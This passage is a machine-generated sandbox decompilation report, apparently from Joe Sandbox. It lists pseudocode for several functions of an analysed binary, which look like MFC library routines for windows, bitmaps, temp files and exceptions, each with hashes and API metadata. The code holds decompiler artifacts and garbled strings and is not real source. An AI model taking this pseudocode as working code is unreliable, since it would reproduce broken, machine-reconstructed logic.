                                            								if(_t275 > 0) {
                                            									_t250 = _t275;
                                            									_t202 = _v8 + 4;
                                            									_v24 = _t202;
                                            									do {
                                            										if(( *(_t202 + 5) & 0x00000001) != 0 &&  *_t202 != 0) {
                                            											_t268 = _t268 + 1;
                                            										}
                                            										_t202 = _t202 + 0x14;
                                            										_t250 = _t250 - 1;
                                            									} while (_t250 != 0);
                                            									if(_t268 > 0) {
                                            										_t205 = E004131DD(_t268 + _t268 * 2 << 3);
                                            										if(_t205 == 0) {
                                            											_t205 = 0;
                                            											__eflags = 0;
                                            										} else {
                                            											_a12 = _t268 - 1;
                                            										}
                                            										_v16 = _v16 & 0x00000000;
                                            										_a12 = _a12 & 0x00000000;
                                            										_v20 = _t205;
                                            										_t67 = _t205 + 8; // 0x8
                                            										_t272 = _t67;
                                            										_t206 = _v24;
                                            										_v12 = _t272;
                                            										_v24 = _t206;
                                            										do {
                                            											if(( *(_t206 + 5) & 0x00000001) != 0 &&  *_t206 != 0) {
                                            												_t252 = _a12;
                                            												 *((intOrPtr*)(_t272 - 8)) = _t252;
                                            												 *((intOrPtr*)(_t272 - 4)) =  *_t206;
                                            												 *((intOrPtr*)( *_t227 + 0xe0))(_t252,  &_v68);
                                            												E0041A32D(_t227,  &_v68);
                                            												_v16 = _v16 + 1;
                                            												asm("movsd");
                                            												asm("movsd");
                                            												_v12 = _v12 + 0x18;
                                            												_t206 = _v24;
                                            												asm("movsd");
                                            												asm("movsd");
                                            												_t275 = _v28;
                                            												_t272 = _v12;
                                            											}
                                            											_a12 = _a12 + 1;
                                            											_t206 = _t206 + 0x14;
                                            											_v24 = _t206;
                                            										} while (_a12 < _t275);
                                            										_t268 = _v16;
                                            									}
                                            								}
                                            								_t185 =  *(_t227 + 0x64);
                                            								if((_t185 & 0x00000001) != 0 && (_t185 & 0x00000004) != 0) {
                                            									 *((intOrPtr*)(_t227 + 0x54)) = _v52;
                                            								}
                                            								_a12 = _a12 & 0x00000000;
                                            								_t308 = _t275;
                                            								if(_t275 > 0) {
                                            									_v16 = _v8;
                                            									do {
                                            										E0041C2B4(_t227, _t308, _a12, _v16);
                                            										_a12 = _a12 + 1;
                                            										_v16 = _v16 + 0x14;
                                            									} while (_a12 < _t275);
                                            								}
                                            								if(_t268 > 0) {
                                            									_t187 = _v20;
                                            									_v24 = _t268;
                                            									_t113 = _t187 + 8; // 0x8
                                            									_t279 = _t113;
                                            									_a12 = _t279;
                                            									do {
                                            										_t188 = E0041649C(_t227,  *((intOrPtr*)(_t279 - 4)));
                                            										_v28 = _t188;
                                            										if(_t188 != 0) {
                                            											GetWindowRect( *(_t188 + 0x1c),  &_v68);
                                            											 *((intOrPtr*)( *_t227 + 0xe0))( *((intOrPtr*)(_a12 - 8)),  &_v68);
                                            											E0041663D(_v28, 0, _v68.left -  *_t279 + _v68.left, _v68.top -  *((intOrPtr*)(_t279 + 4)) + _v68.top, 0, 0, 0x15);
                                            											_t279 = _a12;
                                            										}
                                            										_t279 = _t279 + 0x18;
                                            										_t130 =  &_v24;
                                            										 *_t130 = _v24 - 1;
                                            										_a12 = _t279;
                                            									} while ( *_t130 != 0);
                                            									E00413206(_v20);
                                            								}
                                            								 *(_t227 + 0x84) = _v44.bottom;
                                            							}
                                            							E00413206(_v8);
                                            						}
                                            					}
                                            				}
                                            				SetRectEmpty( &_v68);
                                            				E0041F52D(_t227,  &_v68, _a8 & 0x00000002);
                                            				_v48 = _v48 + _v68.top - _v68.bottom;
                                            				_v52 = _v52 + _v68.left - _v68.right;
                                            				_t232 = E0041E6BA( &(_v44.right), _a8 & 0x00000001, _a8 & 0x00000002);
                                            				_t173 =  *_t232;
                                            				_t233 =  *((intOrPtr*)(_t232 + 4));
                                            				if(_v52 <= _t173) {
                                            					_v52 = _t173;
                                            				}
                                            				if(_v48 <= _t233) {
                                            					_v48 = _t233;
                                            				}
                                            				_t174 = _a4;
                                            				 *_t174 = _v52;
                                            				 *((intOrPtr*)(_t174 + 4)) = _v48;
                                            				return _t174;
                                            			}







































                                            0x0041caa3
                                            0x0041caa6
                                            0x0041caa9
                                            0x0041caa9
                                            0x0041caac
                                            0x0041caac
                                            0x0041cab4
                                            0x0041cab9
                                            0x0041cabd
                                            0x0041cabd
                                            0x0041cac6
                                            0x0041cacb
                                            0x0041c874
                                            0x0041c853
                                            0x0041cad0
                                            0x0041cae3
                                            0x0041caf1
                                            0x0041cafa
                                            0x0041cb0d
                                            0x0041cb12
                                            0x0041cb17
                                            0x0041cb1a
                                            0x0041cb1c
                                            0x0041cb1c
                                            0x0041cb22
                                            0x0041cb24
                                            0x0041cb24
                                            0x0041cb27
                                            0x0041cb2d
                                            0x0041cb32
                                            0x0041cb36

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Rect$Empty$Window
                                            • String ID: @
                                            • API String ID: 444217639-2766056989
                                            • Opcode ID: d032af0db132cd29ccf4fbc2b8467907f78f06d14932db45b8acfededcc1a552
                                            • Instruction ID: cf120915a9bc79257b06898680a609e4f39c2be92c1a3f6b3b2cd3709033a41d
                                            • Opcode Fuzzy Hash: d032af0db132cd29ccf4fbc2b8467907f78f06d14932db45b8acfededcc1a552
                                            • Instruction Fuzzy Hash: 81C14771A40219AFCF15DFA8CC84AEEBBB5FF44354F04816AE815AB351D738AD81CB58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 76%
                                            			E00418A76() {
                                            				intOrPtr _t35;
                                            				void* _t38;
                                            				intOrPtr _t48;
                                            				intOrPtr _t49;
                                            				void* _t50;
                                            				void* _t64;
                                            				intOrPtr* _t74;
                                            				intOrPtr _t76;
                                            				intOrPtr _t77;
                                            				void* _t78;
                                            				intOrPtr _t90;
                                            
                                            				E00406520(E00429F80, _t78);
                                            				_t35 =  *0x436980; // 0x436994
                                            				_t55 =  *((intOrPtr*)(_t78 + 0x14));
                                            				 *((intOrPtr*)(_t78 - 0x10)) =  *((intOrPtr*)(_t78 + 0x14));
                                            				 *((intOrPtr*)(_t78 + 0x14)) = _t35;
                                            				_t74 =  *((intOrPtr*)(_t78 + 0xc));
                                            				 *(_t78 - 4) = 0;
                                            				if(_t74 == 0) {
                                            					L19:
                                            					if( *((intOrPtr*)( *((intOrPtr*)(_t78 + 0x14)) - 8)) == 0) {
                                            						_t90 =  *0x439c48; // 0x1
                                            						_push(0x104);
                                            						if(_t90 == 0) {
                                            							lstrcpynA(_t78 - 0x114,  *(_t78 + 8), ??);
                                            						} else {
                                            							_push(_t78 - 0x114);
                                            							_push( *(_t78 + 8));
                                            							E00417CBF();
                                            						}
                                            						E0041E3FA(_t78 + 0x14, _t55, _t78 - 0x114);
                                            					}
                                            					E0041BB46( *((intOrPtr*)(_t78 + 0x14)), 0x30,  *((intOrPtr*)(_t78 - 0x10)));
                                            					L25:
                                            					 *(_t78 - 4) =  *(_t78 - 4) | 0xffffffff;
                                            					_t38 = E00416AEC(_t78 + 0x14);
                                            					 *[fs:0x0] =  *((intOrPtr*)(_t78 - 0xc));
                                            					return _t38;
                                            				}
                                            				if(E00416753(_t74, 0x42d4d0) != 0) {
                                            					goto L25;
                                            				}
                                            				if(E00416753(_t74, ?str?) == 0) {
                                            					_t48 = E00416753(_t74, "H�B");
                                            					__eflags = _t48;
                                            					if(_t48 == 0) {
                                            						goto L19;
                                            					}
                                            					_t49 =  *((intOrPtr*)(_t74 + 0x10));
                                            					_t64 = _t74 + 0x10;
                                            					__eflags =  *((intOrPtr*)(_t49 - 8));
                                            					if( *((intOrPtr*)(_t49 - 8)) == 0) {
                                            						E00416BE5(_t64,  *(_t78 + 8));
                                            					}
                                            					_t50 = E00416CC1(_t78 + 0x14, _t78, 0xff);
                                            					__eflags =  *((intOrPtr*)( *_t74 + 0xc))(_t50, 0x100, _t78 - 0x10);
                                            					if(__eflags == 0) {
                                            						_t76 =  *((intOrPtr*)(_t74 + 8));
                                            						__eflags = _t76 - 2;
                                            						if(__eflags >= 0) {
                                            							__eflags = _t76 - 3;
                                            							if(__eflags <= 0) {
                                            								_t55 = 0xf121;
                                            							} else {
                                            								__eflags = _t76 - 5;
                                            								if(_t76 == 5) {
                                            									__eflags =  *((intOrPtr*)(_t78 + 0x10));
                                            									_t55 = (0 | __eflags != 0x00000000) + 0xf123;
                                            								} else {
                                            									__eflags = _t76 - 0xd;
                                            									if(__eflags == 0) {
                                            										_t55 = 0xf122;
                                            									}
                                            								}
                                            							}
                                            						}
                                            					}
                                            					E00416D10(_t78 + 0x14, __eflags, 0xffffffff);
                                            				} else {
                                            					_t77 =  *((intOrPtr*)(_t74 + 8));
                                            					if(_t77 == 3 || _t77 > 4 && _t77 <= 7) {
                                            						_t55 = 0xf120;
                                            					}
                                            				}
                                            			}

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: H_prologlstrcpyn
                                            • String ID: HB$pB
                                            • API String ID: 588646068-605489205
                                            • Opcode ID: ff96da6f84b56ea17657301ddea9ad1fb8759a806265bcfd84cdef9f7fdf6d18
                                            • Instruction ID: a9f5f5579fdfe236bfe92a05d823b87aef4f8825b77d1c3b985387d1bf5da384
                                            • Opcode Fuzzy Hash: ff96da6f84b56ea17657301ddea9ad1fb8759a806265bcfd84cdef9f7fdf6d18
                                            • Instruction Fuzzy Hash: EF419D71A0421A9BCF21EF55C8819EEB3A5EF04354F11412FF866A71E0EB38AD80CB5D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 96%
                                            			E00416FCD(void** __ecx, char* _a4, short _a8) {
                                            				signed int _v8;
                                            				void** _v12;
                                            				signed int _v16;
                                            				short* _v20;
                                            				short _v84;
                                            				signed int _t47;
                                            				signed int _t48;
                                            				void* _t61;
                                            				signed int* _t67;
                                            				void* _t75;
                                            				signed int _t81;
                                            				short* _t84;
                                            				signed int _t86;
                                            				signed int _t93;
                                            				void** _t94;
                                            				void* _t96;
                                            
                                            				_v12 = __ecx;
                                            				if(__ecx[1] != 0) {
                                            					_t67 = GlobalLock( *__ecx);
                                            					_t47 = _t67[0];
                                            					_v8 = 0 | _t47 == 0x0000ffff;
                                            					if(_t47 != 0xffff) {
                                            						_t48 =  *_t67;
                                            					} else {
                                            						_t48 = _t67[3];
                                            					}
                                            					asm("sbb esi, esi");
                                            					_v16 = _t48 & 0x00000040;
                                            					_t93 = ( ~_v8 & 0x00000002) + 1 << 1;
                                            					if(_v8 == 0) {
                                            						 *_t67 =  *_t67 | 0x00000040;
                                            					} else {
                                            						_t67[3] = _t67[3] | 0x00000040;
                                            					}
                                            					_a4 = _t93 + MultiByteToWideChar(0, 0, _a4, 0xffffffff,  &_v84, 0x20) * 2;
                                            					_t84 = E00416E50(_t67);
                                            					_t75 = 0;
                                            					_v20 = _t84;
                                            					if(_v16 != 0) {
                                            						_t22 = E00406A48(_t84 + _t93) * 2; // 0x3
                                            						_t75 = _t93 + _t22 + 2;
                                            					}
                                            					_t26 = _t84 + 3; // 0x6
                                            					_t55 = _t75 + _t26 & 0x000000fc;
                                            					_v16 = _t75 + _t26 & 0x000000fc;
                                            					_t86 = _t84 +  &(_a4[3]) & 0xfffffffc;
                                            					if(_v8 == 0) {
                                            						_t81 = _t67[2];
                                            					} else {
                                            						_t81 = _t67[4];
                                            					}
                                            					if(_a4 != _t75 && _t81 > 0) {
                                            						E00405EA0(_t86, _t55, _t67 - _t55 + _v12[1]);
                                            						_t96 = _t96 + 0xc;
                                            					}
                                            					 *_v20 = _a8;
                                            					E00405EA0(_v20 + _t93,  &_v84, _a4 - _t93);
                                            					_t94 = _v12;
                                            					_t94[1] = _t94[1] + _t86 - _v16;
                                            					GlobalUnlock( *_t94);
                                            					_t94[2] = _t94[2] & 0x00000000;
                                            					_t61 = 1;
                                            					return _t61;
                                            				}
                                            				return 0;
                                            			}

                                            APIs
                                            • GlobalLock.KERNEL32 ref: 00416FE9
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 0041703C
                                            • GlobalUnlock.KERNEL32(?), ref: 004170D3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Global$ByteCharLockMultiUnlockWide
                                            • String ID: System
                                            • API String ID: 231414890-3470857405
                                            • Opcode ID: 1a9a31325cfa5bba34be76270e85657ed16da1fae0bf9ce6274e1f8cd34a53b2
                                            • Instruction ID: c2f8acceaa533c94d1390ef28e6fe5bddd73ae44c4aad8fbd6ca481d2bb84418
                                            • Opcode Fuzzy Hash: 1a9a31325cfa5bba34be76270e85657ed16da1fae0bf9ce6274e1f8cd34a53b2
                                            • Instruction Fuzzy Hash: 9741E872904305EFCB10DFA4C8859EF7BB5FF44354F50816AE815AB284D3399A86CB98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 96%
                                            			E004227B5(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed char _a17) {
                                            				intOrPtr _v8;
                                            				void* __ebp;
                                            				int _t42;
                                            				void* _t69;
                                            				intOrPtr _t71;
                                            				intOrPtr* _t74;
                                            				intOrPtr _t76;
                                            				void* _t77;
                                            
                                            				_t69 = __edx;
                                            				_push(__ecx);
                                            				_t71 = _a4;
                                            				_v8 = __ecx;
                                            				if( *((intOrPtr*)(_t71 + 0x6c)) == 0) {
                                            					L6:
                                            					if(( *(_t71 + 0x64) & 0x00000004) != 0) {
                                            						_a16 = _a16 | 0x00000004;
                                            						if((_a17 & 0x00000050) != 0) {
                                            							_a16 = _a16 & 0x0000002f | 0x00000020;
                                            						}
                                            					}
                                            					_t74 = E004225E5(_v8, _t77, _a16);
                                            					E0041663D(_t74, 0, _a8, _a12, 0, 0, 0x15);
                                            					if( *((intOrPtr*)(_t74 + 0x20)) == 0) {
                                            						_t29 = _t71 + 0x1c; // 0x9630a380
                                            						 *((intOrPtr*)(_t74 + 0x20)) =  *_t29;
                                            					}
                                            					E0041D196(E0041649C(_t74, 0xe81f), _t69, _t71, 0);
                                            					 *((intOrPtr*)( *_t74 + 0xc8))(1);
                                            					_t32 = _t71 + 0x1c; // 0x9630a380
                                            					_t42 = GetWindowLongA( *_t32, 0xfffffff0);
                                            					if((_t42 & 0x10000000) == 0) {
                                            						L14:
                                            						return _t42;
                                            					} else {
                                            						E0041668C(_t74, 8);
                                            						L13:
                                            						_t42 = UpdateWindow( *(_t74 + 0x1c));
                                            						goto L14;
                                            					}
                                            				}
                                            				_t4 = _t71 + 0x70; // 0xc8b8c35e
                                            				_t76 =  *_t4;
                                            				if(_t76 == 0 ||  *((intOrPtr*)(_t76 + 0x78)) == 0 || E0041D12E(_t76) != 1 || ( *(_t76 + 0x64) & _a16 & 0x000000f0) == 0) {
                                            					goto L6;
                                            				} else {
                                            					_t74 = E00413740(_t77, GetParent( *(_t76 + 0x1c)));
                                            					E0041663D(_t74, 0, _a8, _a12, 0, 0, 0x15);
                                            					 *((intOrPtr*)( *_t74 + 0xc8))(1);
                                            					goto L13;
                                            				}
                                            			}












                                            APIs
                                            • GetParent.USER32(?), ref: 004227EF
                                              • Part of subcall function 0041663D: SetWindowPos.USER32(?,?,?,?,?,?,00000000,?,00412218,00000000,00000000,00000000,00000000,00000000,00000097,00000000), ref: 00416664
                                            • GetWindowLongA.USER32 ref: 0042288C
                                            • UpdateWindow.USER32(?), ref: 004228A5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Window$LongParentUpdate
                                            • String ID: P
                                            • API String ID: 1906497633-3110715001
                                            • Opcode ID: 4c1a669f7961fc11da61d3b93e60f0e00272df2c871d8d7a3064cd67a7cf3fe7
                                            • Instruction ID: 4478c7b2db2806f657cab283070aca1dc542ec48e340ed71b02adf3b0aace616
                                            • Opcode Fuzzy Hash: 4c1a669f7961fc11da61d3b93e60f0e00272df2c871d8d7a3064cd67a7cf3fe7
                                            • Instruction Fuzzy Hash: C631F371700614BFDB21AF25DD48BAF7BA8FF04704F40062AF9015A2A1CB79EC51CB98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 96%
                                            			E004244A1(void* __edx) {
                                            				signed char* _v8;
                                            				char _v12;
                                            				int _v16;
                                            				void _v148;
                                            				unsigned int _t20;
                                            				int _t26;
                                            				signed int _t36;
                                            				struct HINSTANCE__* _t38;
                                            				struct HBITMAP__* _t39;
                                            				int _t41;
                                            				unsigned int _t43;
                                            				void* _t47;
                                            				signed int* _t48;
                                            				signed int _t53;
                                            				signed int _t57;
                                            				void* _t58;
                                            				void* _t60;
                                            
                                            				_t47 = __edx;
                                            				_t20 = GetMenuCheckMarkDimensions();
                                            				_t41 = _t20;
                                            				_t43 = _t20 >> 0x10;
                                            				_v16 = _t43;
                                            				if(_t41 > 0x20) {
                                            					_t41 = 0x20;
                                            				}
                                            				asm("cdq");
                                            				_t57 = _t41 + 0xf >> 4;
                                            				_t53 = (_t41 - 4 - _t47 >> 1) + (_t57 << 4) - _t41;
                                            				if(_t53 > 0xc) {
                                            					_t53 = 0xc;
                                            				}
                                            				_t26 = 0x20;
                                            				if(_t43 > _t26) {
                                            					_v16 = _t26;
                                            				}
                                            				E00406330( &_v148, 0xff, 0x80);
                                            				_v8 = 0x42c00c;
                                            				_t58 = _t57 + _t57;
                                            				_v12 = 5;
                                            				_t48 = _t60 + (_v16 + 0xfffffffa >> 1) * _t57 * 2 - 0x90;
                                            				do {
                                            					_v8 =  &(_v8[1]);
                                            					_t36 =  !(( *_v8 & 0x000000ff) << _t53);
                                            					_t48[0] = _t36;
                                            					 *_t48 = _t36;
                                            					_t48 = _t48 + _t58;
                                            					_t16 =  &_v12;
                                            					 *_t16 = _v12 - 1;
                                            				} while ( *_t16 != 0);
                                            				_t38 = CreateBitmap(_t41, _v16, 1, 1,  &_v148);
                                            				 *0x439c30 = _t38;
                                            				if(_t38 == 0) {
                                            					_t39 = LoadBitmapA(_t38, 0x7fe3);
                                            					 *0x439c30 = _t39;
                                            					return _t39;
                                            				}
                                            				return _t38;
                                            			}





















                                            APIs
                                            • GetMenuCheckMarkDimensions.USER32 ref: 004244AD
                                            • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 0042455C
                                            • LoadBitmapA.USER32 ref: 00424574
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
                                            • String ID:
                                            • API String ID: 2596413745-3916222277
                                            • Opcode ID: 4b58320a925bd04fdb6ec626dd6c9f65210c363c85a9f202b098ebf0bc32f52f
                                            • Instruction ID: 209a20424c1af6e272a19c9ebc2633acba681278a5e608b332d2eb8150819f76
                                            • Opcode Fuzzy Hash: 4b58320a925bd04fdb6ec626dd6c9f65210c363c85a9f202b098ebf0bc32f52f
                                            • Instruction Fuzzy Hash: 39213A72F00225AFDB20DB78DC85BAEBBB4EB80304F454167E945EB282D7749A45CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 94%
                                            			E0040E47A(void* __ecx) {
                                            				signed int _t22;
                                            				signed char _t36;
                                            				char* _t43;
                                            				void* _t45;
                                            
                                            				E00406520(E0042AE14, _t45);
                                            				_t22 =  *(_t45 + 8) & 0x00000007;
                                            				 *(__ecx + 4) = _t22;
                                            				_t36 =  *(__ecx + 8) & _t22;
                                            				if(_t36 != 0) {
                                            					if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                                            						E004067EC(0, 0);
                                            					}
                                            					_t52 = _t36 & 0x00000004;
                                            					if((_t36 & 0x00000004) == 0) {
                                            						__eflags = _t36 & 0x00000002;
                                            						_t43 = "ios::failbit set";
                                            						if((_t36 & 0x00000002) == 0) {
                                            							_t43 = "ios::eofbit set";
                                            						}
                                            					} else {
                                            						_t43 = "ios::badbit set";
                                            					}
                                            					 *((char*)(_t45 - 0x1c)) =  *((intOrPtr*)(_t45 + 0xf));
                                            					E00401AE0(_t45 - 0x1c, 0);
                                            					E00401B90(_t45 - 0x1c, _t43, E00405A40(_t43));
                                            					_push(_t45 - 0x1c);
                                            					 *((intOrPtr*)(_t45 - 4)) = 0;
                                            					E0040E516(_t45 - 0x38, _t52);
                                            					 *((intOrPtr*)(_t45 - 0x38)) = 0x42f8c4;
                                            					_t22 = E004067EC(_t45 - 0x38, 0x433890);
                                            				}
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
                                            				return _t22;
                                            			}








                                            APIs
                                            • __EH_prolog.LIBCMT ref: 0040E47F
                                              • Part of subcall function 004067EC: RaiseException.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00406468,00000000), ref: 0040681A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: ExceptionH_prologRaise
                                            • String ID: ios::badbit set$ios::eofbit set$ios::failbit set
                                            • API String ID: 3968804221-425934345
                                            • Opcode ID: cfeb44f17044c624223737e36215371a86458169db6e3bb98e6d2c7d25448752
                                            • Instruction ID: 058c2687817cbb3025356127984514509d88e2cf1c36159cda0efedd272f4144
                                            • Opcode Fuzzy Hash: cfeb44f17044c624223737e36215371a86458169db6e3bb98e6d2c7d25448752
                                            • Instruction Fuzzy Hash: E41173B2D015196EC700EBA2D891AEEB778AF04358F44847BF41677282D77C5919CB68
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00418BE2(void* __eflags) {
                                            				intOrPtr _t22;
                                            				intOrPtr _t45;
                                            				void* _t47;
                                            				void* _t52;
                                            
                                            				_t52 = __eflags;
                                            				E00406520(E00429FAB, _t47);
                                            				_t22 =  *0x436980; // 0x436994
                                            				 *((intOrPtr*)(_t47 - 0x14)) = 0;
                                            				 *((intOrPtr*)(_t47 - 0x10)) = _t22;
                                            				_t45 = 1;
                                            				 *((intOrPtr*)(_t47 - 4)) = _t45;
                                            				GetFullPathNameA( *(_t47 + 0xc), 0x104, _t47 - 0x118, _t47 + 0xc);
                                            				 *( *(_t47 + 0xc)) = 0;
                                            				GetTempFileNameA(_t47 - 0x118, "MFC", 0, E00416CC1(_t47 - 0x10, _t47, 0x105));
                                            				E00416D10(_t47 - 0x10, _t52, 0xffffffff);
                                            				if( *((intOrPtr*)(_t47 + 0x10)) == 0) {
                                            					E00417B0B( *((intOrPtr*)(_t47 - 0x10)));
                                            				}
                                            				E00416861( *((intOrPtr*)(_t47 + 8)), _t47 - 0x10);
                                            				 *((intOrPtr*)(_t47 - 0x14)) = _t45;
                                            				 *((char*)(_t47 - 4)) = 0;
                                            				E00416AEC(_t47 - 0x10);
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
                                            				return  *((intOrPtr*)(_t47 + 8));
                                            			}








                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00418BE7
                                            • GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00418C1A
                                            • GetTempFileNameA.KERNEL32(00000105,MFC,00000000,00000000,00000105), ref: 00418C40
                                              • Part of subcall function 00416D10: lstrlenA.KERNEL32(00000000,?,00416FC8,000000FF,?,00411ED7,?,?,?,0003C000,00000010,00000000,?,?), ref: 00416D23
                                              • Part of subcall function 00417B0B: DeleteFileA.KERNEL32(?), ref: 00417B0F
                                              • Part of subcall function 00417B0B: GetLastError.KERNEL32(00000000), ref: 00417B1A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: FileName$DeleteErrorFullH_prologLastPathTemplstrlen
                                            • String ID: MFC
                                            • API String ID: 501224598-3472178984
                                            • Opcode ID: 9a9022fc194ece3b065672907c030a6f4c508a25102b56638d347160a0d79358
                                            • Instruction ID: 106d24b416a7ad35a8895af97b87cb9fb89e8d85cfd421907a0314e2615bf241
                                            • Opcode Fuzzy Hash: 9a9022fc194ece3b065672907c030a6f4c508a25102b56638d347160a0d79358
                                            • Instruction Fuzzy Hash: 90114FB1A01219EFCF00EF94DC819EEB778FF04354F01456AF925A7290DB749A44CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 59%
                                            			E0042514B() {
                                            				signed short _v16;
                                            				signed short _v20;
                                            				char _v24;
                                            				signed int _t6;
                                            				intOrPtr* _t16;
                                            				signed int _t19;
                                            
                                            				_t6 =  *0x43687c; // 0xffffffff
                                            				if(_t6 != 0xffffffff) {
                                            					return _t6;
                                            				}
                                            				_t16 = GetProcAddress(GetModuleHandleA("COMCTL32.DLL"), "DllGetVersion");
                                            				_t19 = 0x40000;
                                            				if(_t16 != 0) {
                                            					E00406330( &_v24, 0, 0x14);
                                            					_v24 = 0x14;
                                            					_push( &_v24);
                                            					if( *_t16() >= 0) {
                                            						_t19 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
                                            					}
                                            				}
                                            				 *0x43687c = _t19;
                                            				return _t19;
                                            			}










                                            APIs
                                            • GetModuleHandleA.KERNEL32(COMCTL32.DLL,004036DA,?,?,004036DA,?,00000800,50402834,?,?,0000E800,?), ref: 00425162
                                            • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 0042516E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
